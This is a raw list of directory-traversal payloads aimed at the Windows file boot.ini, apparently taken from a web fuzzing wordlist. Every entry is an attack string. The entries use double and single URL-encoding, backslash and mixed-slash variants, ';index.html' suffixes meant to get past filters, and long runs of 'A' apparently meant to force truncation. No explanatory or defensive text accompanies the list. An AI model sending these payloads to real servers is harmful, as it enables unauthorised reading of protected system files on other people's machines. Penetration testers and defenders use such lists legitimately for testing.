-..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini;index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini;index.html -%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini;index.html -%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini;index.html -..\boot.ini;index.html -..\..\boot.ini;index.html -..\..\..\boot.ini;index.html -..\..\..\..\boot.ini;index.html -..\..\..\..\..\boot.ini;index.html -..\..\..\..\..\..\boot.ini;index.html -..\..\..\..\..\..\..\boot.ini;index.html -..\..\..\..\..\..\..\..\boot.ini;index.html -..%5cboot.ini;index.html -..%5c..%5cboot.ini;index.html -..%5c..%5c..%5cboot.ini;index.html -..%5c..%5c..%5c..%5cboot.ini;index.html -..%5c..%5c..%5c..%5c..%5cboot.ini;index.html -..%5c..%5c..%5c..%5c..%5c..%5cboot.ini;index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini;index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini;index.html -%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini;index.html -%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini;index.html -..%255cboot.ini;index.html -..%255c..%255cboot.ini;index.html -..%255c..%255c..%255cboot.ini;index.html -..%255c..%255c..%255c..%255cboot.ini;index.html -..%255c..%255c..%255c..%255c..%255cboot.ini;index.html -..%255c..%255c..%255c..%255c..%255c..%255cboot.ini;index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini;index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini;index.html -%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini;index.html -%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot.ini;index.html -\../boot.ini -\../\../boot.ini -\../\../\../boot.ini -\../\../\../\../boot.ini -\../\../\../\../\../boot.ini -\../\../\../\../\../\../boot.ini -\../\../\../\../\../\../\../boot.ini -\../\../\../\../\../\../\../\../boot.ini -/..\boot.ini -/..\/..\boot.ini -/..\/..\/..\boot.ini -/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\/..\/..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\boot.ini 